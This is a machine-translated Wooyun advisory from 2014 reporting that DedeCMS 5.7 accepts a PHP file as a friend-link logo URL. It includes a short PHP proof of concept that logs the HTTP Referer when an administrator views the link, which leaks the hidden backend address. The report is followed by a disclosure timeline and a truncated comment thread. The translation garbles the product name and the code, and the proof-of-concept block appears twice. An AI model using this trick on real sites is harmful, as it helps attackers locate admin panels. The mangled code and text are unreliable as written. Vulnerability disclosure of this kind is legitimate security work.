Dream Somewhere design flaws cause background address leaks | wooyun-2014-76556 | Wooyun

Vulnerability Overview (113) Attention to this vulnerability flaw number: wooyun-2014-76556 vulnerability title: Dream Somewhere design defects cause background address leakage related manufacturers: Dedecms vulnerability Author: MuZhU0 time: 2014-09-19 14:26 public Time: 2014-12-15 14:28 Vulnerability Type: Design defect/Logic error Hazard rating: High self-rating rank:15 Vulnerability Status: Vulnerability has been notified vendors but vendors ignore vulnerabilities Source: http://www.wooyun.org Tags Tags: logical error design improper 21 people collection Sharing Vulnerability: 0 Vulnerability Details Disclosure status:

2014-09-19: Details have been notified to vendors and are awaiting vendor processing
2014-09-24: Vendor proactively ignores vulnerabilities, and details are open to third party security partners
2014-11-15: Details to the core white hat and related field expert public
2014-11-25: Details to the ordinary white hat openly
2014-12-15: Details to the internship white hat openly
2014-12-15: Details to the public
Brief description:

A design flaw, the program to filter some things lax, resulting in the background address leakage, testing only 5.7. There are also problems with other versions of the visual. Detailed Description:

DEDECMS link to the logo address of the application has not been strictly judged and filtered, leading to the submission of PHP, ASP and other suffixes.

And background view links, as shown in the following image, the picture is still the URL submitted when the application.

x.php Code:



<?php

File_put_contents (' X.txt ', $_server[' http_referer '));

Header ("Content-type:image/jpeg");

$img =imagecreatefromjpeg ("x.jpg");

Imagejpeg ($IMG);

Imagedestroy ($IMG);

?>



When you access the file, get $_server[' http_referer ' and write the file to X.TXT.

Vulnerability Proof:

x.php Code:



<?php

File_put_contents (' X.txt ', $_server[' http_referer '));

Header ("Content-type:image/jpeg");

$img =imagecreatefromjpeg ("x.jpg");

Imagejpeg ($IMG);

Imagedestroy ($IMG);

?>



When you access the file, get $_server[' http_referer ' and write the file to X.TXT.

Repair scheme:

Should have understood, I will not shortcoming. Copyright NOTICE: Reprint Please indicate the source muzhu0@ cloud loophole response manufacturer response:

Hazard Rating: No impact manufacturers ignore

Ignore time: 2014-09-24 14:28 Vendor Reply:

Latest Status:

No vulnerability evaluation:

Evaluation of this vulnerability information to better feedback the value of information, including information objectivity, content integrity and whether there is a learning value vulnerability evaluation (a total of 0 people evaluation): After landing to conduct a rating review 2014-09-19 14:27 | Mother Kangaroo (Common white hat | Number of rank:441 vulnerabilities: 59 | The original scenery of the hometown. MP3) 0

Liu Ming ~.  2014-09-19 14:38 | Yulinga (Plain white hat | rank:496 vulnerabilities: 70) # 0

This is good.  2# 2014-09-19 15:15 | See the main amber (passers-by | Rank:25 Vulnerabilities: 2) # 0

Visual Fire 3# 2014-09-19 15:21 | U-God (Core white hat | Rank: